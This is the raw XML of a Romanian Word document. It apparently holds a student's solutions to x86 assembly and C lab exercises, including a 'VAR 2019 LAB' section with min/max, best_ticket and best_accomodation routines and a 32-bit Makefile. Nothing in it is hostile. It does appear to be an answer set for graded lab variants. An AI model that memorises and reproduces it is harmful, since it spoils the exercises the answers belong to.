      <w:r w:rsidRPr="0071525C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00206F82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77627BDB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18367227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BC6121D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sub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10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B1DB77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-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10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5A3D6B06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10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013FBCB2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byte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0536A147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sub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10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD5E582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7D25A7D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5BE6590B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4D364E4D" w14:textId="77777777" w:rsidR="0071525C" w:rsidRDefault="0071525C" w:rsidP="0071525C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AF0A9CC" w14:textId="40B36F96" w:rsidR="0071525C" w:rsidRDefault="0071525C" w:rsidP="0071525C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>c.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D16F241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;TODO c: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Implementati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`void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read_array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(unsigned int *a, int N)` care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citeste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la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intrarea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standard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54588BA4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un vector `a` de `N`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numere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intregi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fara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semn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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F1FF39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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D91615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Citirea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la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intrarea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standard se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face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folosind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`int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scanf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(const char *format, ...);` din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biblioteca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standard C.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0430FE72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e.g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pentru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citirea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unui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intreg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="669E1495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lastRenderedPageBreak/>
        <w:t xml:space="preserve">;       unsigned int </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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elem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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="598888AC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      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scanf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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("%u", &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spell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elem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0071525C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);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="65F00194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3797577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71525C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read_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0071525C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259C22E2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71F30AF8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13F8C841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10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A271857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loop2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DD9A52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48761807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</w:p>
    <w:p w14:paraId="75848F05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+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796FA1C8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+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*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4A9E764F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3C2D89E5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fmt_int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A0FDDD3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scanf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0DBDB402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71525C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58C7EEA6" w14:textId="752424D2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loop</w:t>
      </w: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loop2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091B432E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75ECEC43" w14:textId="77777777" w:rsidR="0071525C" w:rsidRPr="0071525C" w:rsidRDefault="0071525C" w:rsidP="0071525C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71525C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71525C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355C941A" w14:textId="77777777" w:rsidR="0071525C" w:rsidRDefault="0071525C" w:rsidP="0071525C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17425893" w14:textId="3376CF49" w:rsidR="0071525C" w:rsidRDefault="00125785" w:rsidP="0071525C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>VAR 2019 LAB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F679B2" w14:textId="46512061" w:rsidR="00125785" w:rsidRDefault="00125785" w:rsidP="0071525C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00125785">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3153F597" wp14:editId="5062DB68">
            <wp:extent cx="5943600" cy="2104390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="324724704" name="Imagine 1" descr="O imagine care conține text, captură de ecran, Font, număr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24704" name="Imagine 1" descr="O imagine care conține text, captură de ecran, Font, număr&#10;&#10;Descriere generată automat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83CE" w14:textId="1267C88B" w:rsidR="00125785" w:rsidRDefault="00125785" w:rsidP="0071525C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9FE29D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a: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Completati</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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functiile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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min </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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si</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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max</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C57541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9301EBF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int min(int a, int b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261860F3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min:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104C22C5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53DEA6E6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1FB59C66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TODO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153DBC8A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7C76B88B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7192B876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24BB6C66" w14:textId="77777777" w:rsidR="00125785" w:rsidRPr="00125785" w:rsidRDefault="00125785" w:rsidP="0012578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53A3D53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primul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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arg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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+ 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664F82CD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12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al </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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doilea</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1359D0A9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7A6A33B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4ED10558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jb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fin_min</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="43C6E500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04BF748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12578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change_min</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0012578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3D5A6D88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5128D538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688A4E1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12578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fin_min</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0012578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632A15EA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6097AB77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3599DEEE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6B0A1D1C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7E0BB467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2214CFBA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371D33D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int max(int a, int b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C17546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max:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BCB50D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2A7A9D86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3CF9E370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TODO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59971DA5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15593A9B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1B2A02DC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35BC6E64" w14:textId="77777777" w:rsidR="00125785" w:rsidRPr="00125785" w:rsidRDefault="00125785" w:rsidP="0012578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8E3BC36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primul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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arg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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+ 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B81AD6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12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al </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0012578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doilea</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="78EA7EEC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7141540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38801948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jg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fin_max</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2556C19D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C4E7171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12578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change_max</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0012578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3862A184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3ADB17E6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230AF52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12578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fin_max</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0012578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20C28B52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62679AE9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3BAED07C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2578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3C80F7D8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AB0E84B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2FCC6262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2578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2578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4EE71AF9" w14:textId="77777777" w:rsidR="00125785" w:rsidRPr="00125785" w:rsidRDefault="00125785" w:rsidP="00125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046C930" w14:textId="5468E821" w:rsidR="00125785" w:rsidRDefault="00125785" w:rsidP="0071525C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B2F2DE3" w14:textId="6198C786" w:rsidR="00125785" w:rsidRDefault="00125785" w:rsidP="0071525C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>b.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0801836A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b: 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Completati</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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best_ticket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3D1B1DD9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454EB57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%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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define</w:t>
      </w:r>
      <w:proofErr w:type="gram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N (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ebp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+ 12)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D55CD1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C56B391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int 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best_ticket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(int *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ticket_prices</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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, int n)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75337BE4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16501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best_ticket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016501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5324DF33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48938DA8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5FAE2F9C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TODO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38655BC0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vectorul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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de 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numere</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="237D93B1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2397B6F5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0E529DB0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27823C2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16501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next_element</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016501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26009382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inc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7F27A762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[N]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4D4D8B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jge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fin_best</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="43A4998C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CA377B6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16501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begin_best</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016501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46345184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cmp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60280AF8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jle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next_element</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B39BA03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70A1F0D6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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA12361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jmp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next_element</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="33D6E76D" w14:textId="77777777" w:rsidR="00165015" w:rsidRPr="00165015" w:rsidRDefault="00165015" w:rsidP="0016501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6791A5C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16501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fin_best</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016501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7EF52C7C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1EB894EC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3FF002F4" w14:textId="77777777" w:rsidR="00165015" w:rsidRDefault="00165015" w:rsidP="0071525C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="412A53E2" w14:textId="3DE4771B" w:rsidR="00125785" w:rsidRDefault="00125785" w:rsidP="0071525C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>c.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4812CE86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TODO c: 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Completati</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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functia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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best_accomodation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1489D48E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6AC1851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int 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best_accomodation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(int *prices, int *comfort, int n)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132D8EE8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16501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best_accomodation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016501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55D00597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</w:p>
    <w:p w14:paraId="28734B3F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lastRenderedPageBreak/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</w:p>
    <w:p w14:paraId="6A1A7E1C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TODO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1564EA4A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B7CE4DC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6164ACCD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6E462F5A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15938BB4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863438B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16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n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73230C73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prices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A199A1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ebp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12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comfort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8F8716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93E296A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0xFFFFFFFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C799DC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46631F1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16501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begin_accomodation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00165015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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9693B0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, [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 </w:t>
      </w:r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; element din comfort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EACA18F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spellStart"/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xor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edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2FBEC4A4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448A8B50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edx:eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/ [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esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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+ 4 * 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ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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- 4] =&gt; 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catul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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in 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eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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, 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restul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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in 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edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="120F5DB2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div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dword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[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+ </w:t>
      </w:r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*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 </w:t>
      </w:r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; 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catul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00165015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eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="728A4323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D3E8EE0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23FBF647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1423BF89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3A77B805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push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1DDB7C13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call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min</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083399BB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add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esp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8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9D5095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4294011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ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2D8BA125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0B1E188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mov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,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eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2325F720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2863C81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proofErr w:type="gramStart"/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loop</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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begin_accomodation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72CBC4FA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E5099CB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edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4528CB99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esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="49179807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pop</w:t>
      </w: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165015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ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="29303084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leave</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C207FA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165015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165015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ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B8DB5D" w14:textId="77777777" w:rsidR="00165015" w:rsidRPr="00165015" w:rsidRDefault="00165015" w:rsidP="0016501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5B35D62" w14:textId="424D82CE" w:rsidR="00165015" w:rsidRDefault="005644F2" w:rsidP="0071525C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005644F2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="329FDEAC" wp14:editId="1F191E22">
            <wp:extent cx="5943600" cy="3311525"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="676984019" name="Imagine 1" descr="O imagine care conține text, captură de ecran, Font, documen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84019" name="Imagine 1" descr="O imagine care conține text, captură de ecran, Font, document&#10;&#10;Descriere generată automat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4836" w14:textId="7FA45DCA" w:rsidR="005644F2" w:rsidRDefault="005644F2" w:rsidP="0071525C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA357A4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CFLAGS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color w:val="B6B1B1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>=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-Wall -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Wextra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-m32 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Iinclude</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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fno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-stack-protector -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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mpreferred</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-stack-boundary=2 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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fno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-PIC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E660559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LDFLAGS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color w:val="B6B1B1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>=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-m32 -no-pie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE7E7D8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DB6325F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# TODO: Compile main with task2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B72560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all</w:t>
      </w:r>
      <w:r w:rsidRPr="005644F2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="B6B1B1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: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main.o</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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secret.o</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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task2.o</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A21BCED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$(</w:t>
      </w:r>
      <w:r w:rsidRPr="005644F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CC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 $(</w:t>
      </w:r>
      <w:r w:rsidRPr="005644F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CFLAGS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) </w:t>
      </w:r>
      <w:r w:rsidRPr="005644F2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FE4450"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>$^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-o main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B599CE6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7E5045C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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005644F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main.o</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005644F2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="B6B1B1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: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main.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="57E53156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$(</w:t>
      </w:r>
      <w:r w:rsidRPr="005644F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CC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 $(</w:t>
      </w:r>
      <w:r w:rsidRPr="005644F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CFLAGS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) </w:t>
      </w:r>
      <w:r w:rsidRPr="005644F2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FE4450"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>$^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-c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA28A02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C95396F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# TODO: Add rule for task2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C90E78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task2.o</w:t>
      </w:r>
      <w:r w:rsidRPr="005644F2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="B6B1B1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: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task2.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633D05CE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$(</w:t>
      </w:r>
      <w:r w:rsidRPr="005644F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CC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 $(</w:t>
      </w:r>
      <w:r w:rsidRPr="005644F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CFLAGS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) </w:t>
      </w:r>
      <w:r w:rsidRPr="005644F2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FE4450"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>$^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-c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3714A579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E1CF38B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clean</w:t>
      </w:r>
      <w:r w:rsidRPr="005644F2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="B6B1B1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B7D425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rm -rf task2.o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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main.o</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52524F34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32F755E6" w14:textId="77777777" w:rsidR="005644F2" w:rsidRDefault="005644F2" w:rsidP="0071525C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B02F47A" w14:textId="5F8370CA" w:rsidR="005644F2" w:rsidRDefault="005644F2" w:rsidP="0071525C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>b.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00657FE0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72F1B8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>#include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&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005644F2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stdio.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005644F2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="FF8B39"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E76FF1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59BE59E6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lastRenderedPageBreak/>
        <w:t>// TODO: Freestyle starts here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768BC39D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void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color w:val="36F9F6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>task2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(</w:t>
      </w:r>
      <w:r w:rsidRPr="005644F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unsigned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char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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>msg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[</w:t>
      </w:r>
      <w:r w:rsidRPr="005644F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], </w:t>
      </w:r>
      <w:r w:rsidRPr="005644F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unsigned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char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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>c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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADC4FED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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F31489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644F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unsigned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char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gramStart"/>
      <w:r w:rsidRPr="005644F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mask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;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="286792BA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874C3F0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</w:t>
      </w:r>
      <w:r w:rsidRPr="005644F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for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(</w:t>
      </w:r>
      <w:r w:rsidRPr="005644F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int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spellStart"/>
      <w:r w:rsidRPr="005644F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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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=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; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005644F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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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&lt;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4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; </w:t>
      </w:r>
      <w:r w:rsidRPr="005644F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++</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005644F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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228D83EA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r w:rsidRPr="005644F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mask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=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gramStart"/>
      <w:r w:rsidRPr="005644F2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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>c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;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2A0A648D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6BC04611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r w:rsidRPr="005644F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mask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&amp;=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0b11000000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;</w:t>
      </w:r>
      <w:r w:rsidRPr="005644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// </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005644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stergem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
